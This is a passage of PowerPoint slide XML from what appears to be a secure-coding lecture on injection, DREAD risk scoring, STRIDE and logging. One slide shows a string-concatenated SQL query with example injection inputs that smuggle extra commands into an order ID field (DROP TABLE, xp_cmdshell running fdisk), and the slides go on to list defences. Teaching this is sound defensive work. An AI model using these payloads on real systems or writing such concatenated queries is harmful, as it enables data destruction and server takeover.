            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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Validate, validate, validate!</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Treat user input like any other input – don’t trust it</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Can lead to server-side script injection</a:t>
            </a:r>
          </a:p>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Same considerations apply as for </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>File Upload</a:t>
            </a:r>
            <a:r>
              <a:t> when creating the file on the server</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62" name="http://t3.gstatic.com/images?q=tbn:ANd9GcS9w6FpUmlF_7fPYo-MrIctt4y5KUIHhDEyyDotgvHATx759yJs&amp;t=1" descr="http://t3.gstatic.com/images?q=tbn:ANd9GcS9w6FpUmlF_7fPYo-MrIctt4y5KUIHhDEyyDotgvHATx759yJs&amp;t=1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8561493" y="2275839"/>
            <a:ext cx="4118188" cy="3088642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1265" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="866986" y="2463706"/>
            <a:ext cx="8030950" cy="1729459"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8030949" cy="1729457"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1263" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8030950" cy="1729458"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1264" name="sqlString = &quot;SELECT HasShipped FROM&quot;…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="84424" y="247254"/>
              <a:ext cx="7862101" cy="1234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650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>sqlString = "SELECT HasShipped FROM"</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>	+ " OrderDetail WHERE OrderID ='"</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>	+ ID + "'";</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="ALFKI1001…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494648" y="5960533"/>
            <a:ext cx="9992926" cy="2847060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001' or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001'; DROP TABLE OrderDetail --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845819" indent="-388619">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>ALFKI1001'; exec xp_cmdshell('fdisk.exe') --</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1270" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="541866" y="2275839"/>
          <a:ext cx="11673255" cy="3414963"/>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5167032"/>
                <a:gridCol w="539472"/>
                <a:gridCol w="787017"/>
                <a:gridCol w="841144"/>
                <a:gridCol w="841144"/>
                <a:gridCol w="841144"/>
                <a:gridCol w="1201635"/>
                <a:gridCol w="1441962"/>
              </a:tblGrid>
              <a:tr h="882068">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>Threat</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>D</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>R</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>E</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>A</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>D</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>Total</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>Rating</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r>
              <a:tr h="1638125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>Attacker obtains authentication credentials by monitoring the network.</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>2</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>2</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>2</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>12</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>High</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882068">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>SQL commands injected into application.</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>2</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>14</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1300480">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>High</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1271" name="12–15 High risk,8–11 Medium risk, 5–7 Low risk."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5743786" y="8994986"/>
            <a:ext cx="7044268" cy="4856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300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>12–15 High risk,8–11 Medium risk, 5–7 Low risk.</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5" name="Types of Injection"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Types of Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="LDAP Queries SQL Queries XPath Queries Program Arguments OS Commands"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>LDAP Queries</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>SQL Queries</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>XPath Queries</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Program Arguments</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>OS Commands</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8" name="Defense"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Use of Prepared Statements (Parameterized Queries)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Use of Prepared Statements (Parameterized Queries)</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Use of Stored Procedures</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Escaping all User Supplied Input</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Least Privilege</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>White List Input Validation</a:t>
            </a:r>
            <a:r>
              <a:t> </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1" name="Repudiation"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Repudiation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12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4" name="Insufficient monitoring allows attackers to work unnoticed"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Insufficient monitoring allows attackers to work unnoticed</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6" name="Logging isn’t just important for identifying attacks in progress; it can assist with the forensic analysis after an attack has succeeded."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Logging isn’t just important for identifying attacks in progress; it can assist with the forensic analysis after an attack has succeeded.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1" name="Threat Modeling Methodologies"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Threat Modeling Methodologies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="STRIDE…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2926079"/>
            <a:ext cx="11704322" cy="6502401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>STRIDE</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>PASTA</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Process for attack simulation and threat analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="407193" indent="-407193">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3800"/>
              <a:t>AAA </a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Authentication, Authorisation, Auditing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Trike</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="845003" indent="-387803">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:t>http://sourceforge.net/projects/trike/ </a:t>
            </a:r>
            <a:endParaRPr sz="12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82">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">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582">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="582">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
